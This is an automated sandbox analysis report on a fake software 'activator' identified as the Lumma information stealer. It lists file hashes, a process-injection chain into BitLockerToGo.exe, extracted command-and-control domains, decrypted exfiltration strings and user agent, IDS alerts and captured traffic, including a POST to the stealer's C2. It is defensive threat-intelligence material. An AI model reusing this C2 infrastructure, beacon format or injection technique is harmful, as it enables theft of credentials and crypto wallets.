Windows Analysis Report
Activator by URKE v2.5.exe

Overview

General Information

Sample name: Activator by URKE v2.5.exe
Analysis ID: 1525047
MD5: 95d5f32afd610e2e7077bd350eac99c0
SHA1: 8fe090a11768454297c17b31fd164a0f2685eca7
SHA256: 9e12b0e0ec0101e6fcb4c10e1b5958e534f937dfdc9394b2095b06f29d22867f
Tags: exe, user-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Activator by URKE v2.5.exe (PID: 2740 cmdline: "C:\Users\user\Desktop\Activator by URKE v2.5.exe" MD5: 95D5F32AFD610E2E7077BD350EAC99C0)
    • n3.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe" MD5: 2706AC6F789E6BDBDA8DAE9D8460FEC8)
      • BitLockerToGo.exe (PID: 4368 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
    • chrome.exe (PID: 4236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 6088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,1522399523458594779,8666875280555869033,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["deallyharvenw.shop", "covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "branchtriviawlek.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "abortinoiwiam.shop", "surroundeocw.shop"], "Build id": "tLYMe5--3"}
Source | Rule | Description | Author | Strings
00000002.00000003.2196083271.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000002.00000002.2287277784.0000000002C7C000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-03T16:09:19.961621+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 104.21.42.210 | 443 | TCP
    2024-10-03T16:09:19.961621+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 104.21.42.210 | 443 | TCP
    2024-10-03T16:09:17.352943+0200 | 2056068 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59301 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.375637+0200 | 2056066 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59163 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.319367+0200 | 2056074 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49446 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.308396+0200 | 2056076 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 62424 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.330985+0200 | 2056072 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59874 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.341243+0200 | 2056070 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 51551 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.295246+0200 | 2056078 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63230 | 1.1.1.1 | 53 | UDP
    2024-10-03T16:09:17.363756+0200 | 2056064 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 59846 | 1.1.1.1 | 53 | UDP

    AV Detection

    Source: https://steamcommunity.com/profiles/76561199724331900, URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/, URL Reputation: Label: malware
    Source: 2.2.n3.exe.2ad4000.3.raw.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["deallyharvenw.shop", "covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "branchtriviawlek.shop", "defenddsouneuw.shop", "racedsuitreow.shop", "abortinoiwiam.shop", "surroundeocw.shop"], "Build id": "tLYMe5--3"}
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe, ReversingLabs: Detection: 62%
    Source: Activator by URKE v2.5.exe, ReversingLabs: Detection: 47%
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: covvercilverow.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: surroundeocw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: abortinoiwiam.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: pumpkinkwquo.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: priooozekw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: deallyharvenw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: defenddsouneuw.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: racedsuitreow.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: branchtriviawlek.shop
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: Workgroup: -
    Source: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: tLYMe5--3
    Source: https://iplogger.com/1KhnJ4, HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
    Source: https://iplogger.com/1KhnJ4, HTTP Parser: No favicon
    Source: unknown, HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:49699 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49705 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 104.21.42.210:443 -> 192.168.2.6:49707 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49731 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: Activator by URKE v2.5.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: drvstore.pdbUGP source: drvstore.dll
    Source: Binary string: DUI70.pdbUGP source: dui70.dll
    Source: Binary string: BitLockerToGo.pdb source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: main.PdBZjclTtSvJRifuFYQiitxyoCIkNHGKTcVnnvxAzYWmHRXTXqWdymDLj source: n3.exe
    Source: Binary string: dsreg.pdbGCTL source: dsreg.dll
    Source: Binary string: DWrite.pdbUGP source: DWrite.dll
    Source: Binary string: dsound.pdbUGP source: dsound.dll
    Source: Binary string: dpx.pdb source: dpx.dll
    Source: Binary string: BitLockerToGo.pdbGCTL source: n3.exe, 00000002.00000002.2284662032.00000000025B8000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: dsadmin.pdbGCTL source: dsadmin.dll
    Source: Binary string: dsuiext.pdb source: dsuiext.dll
    Source: Binary string: dosvc.pdb source: dosvc.dll
    Source: Binary string: dxgi.pdbUGP source: dxgi.dll
    Source: Binary string: DUI70.pdb source: dui70.dll
    Source: Binary string: DUser.pdbUGP source: duser.dll
    Source: Binary string: dxil.pdb source: dxil.dll
    Source: Binary string: dsreg.pdb source: dsreg.dll
    Source: Binary string: dpx.pdbGCTL source: dpx.dll
    Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\dxcompiler.dll.pdb source: dxcompiler.dll
    Source: Binary string: drvstore.pdb source: drvstore.dll
    Source: Binary string: dsuiext.pdbGCTL source: dsuiext.dll
    Source: Binary string: dwmcore.pdb source: dwmcore.dll
    Source: Binary string: DWrite.pdb source: DWrite.dll
    Source: Binary string: dsadmin.pdb source: dsadmin.dll
    Source: Binary string: dxgi.pdb source: dxgi.dll
    Source: Binary string: dwmcore.pdbUGP source: dwmcore.dll
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: Activator by URKE v2.5.exe
    Source: Binary string: DUser.pdb source: duser.dll
    Source: Binary string: dsound.pdb source: dsound.dll
    Source: Binary string: dosvc.pdbUGP source: dosvc.dll
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe, Code function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe, Code function: 0_2_00007FF7E5EF647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5EF647C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe, Code function: 0_2_00007FF7E5F23130 FindFirstFileExA,0_2_00007FF7E5F23130

    Networking

    Source: Network traffic, Suricata IDS: 2056076 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop) : 192.168.2.6:62424 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.6:63230 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056072 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop) : 192.168.2.6:59874 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056066 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covvercilverow .shop) : 192.168.2.6:59163 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056074 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop) : 192.168.2.6:49446 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056068 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abortinoiwiam .shop) : 192.168.2.6:59301 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056070 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pumpkinkwquo .shop) : 192.168.2.6:51551 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2056064 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surroundeocw .shop) : 192.168.2.6:59846 -> 1.1.1.1:53
    Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.42.210:443
    Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.42.210:443
    Source: Joe Sandbox View, IP Address: 104.18.94.41
    Source: Joe Sandbox View, IP Address: 104.18.95.41
    Source: Joe Sandbox View, IP Address: 239.255.255.250
    Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
    Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknown, TCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknown, TCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknown, TCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
    Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
    Source: global traffic HTTP traffic detected: GET /1KhnJ4 HTTP/1.1 Host: iplogger.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
    Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
    Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
    Source: global traffic DNS traffic detected: DNS query: branchtriviawlek.shop
    Source: global traffic DNS traffic detected: DNS query: racedsuitreow.shop
    Source: global traffic DNS traffic detected: DNS query: defenddsouneuw.shop
    Source: global traffic DNS traffic detected: DNS query: deallyharvenw.shop
    Source: global traffic DNS traffic detected: DNS query: priooozekw.shop
    Source: global traffic DNS traffic detected: DNS query: pumpkinkwquo.shop
    Source: global traffic DNS traffic detected: DNS query: abortinoiwiam.shop
    Source: global traffic DNS traffic detected: DNS query: surroundeocw.shop
    Source: global traffic DNS traffic detected: DNS query: covvercilverow.shop
    Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic DNS traffic detected: DNS query: advocachark.store
    Source: global traffic DNS traffic detected: DNS query: iplogger.com
    Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global traffic DNS traffic detected: DNS query: www.google.com
    Source: unknown HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: advocachark.store
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/R
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/api
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store/api9
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://advocachark.store:443/apipp
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&amp;l=e
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english
    Source: BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: n3.exeString found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
    Source: n3.exeString found in binary or memory: https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshall
    Source: n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//sticker-packs
    Source: n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/
